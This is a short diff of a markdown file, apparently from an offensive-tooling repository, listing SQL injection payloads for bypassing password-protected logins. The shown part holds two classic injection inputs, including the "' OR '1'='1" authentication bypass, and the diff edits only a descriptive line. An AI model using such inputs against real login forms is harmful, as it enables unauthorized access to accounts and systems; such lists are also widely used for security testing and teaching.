NobleNomadic/Kiwi/payload/sqli/payloadlist.md

 # SQL Injection Payloads
 ## Bypass password
-These commands can be used to try and bypass password restricted logins
+These inputs can be used to bypass password restricted logins
 ```sql
 username' OR '1'='1
 username'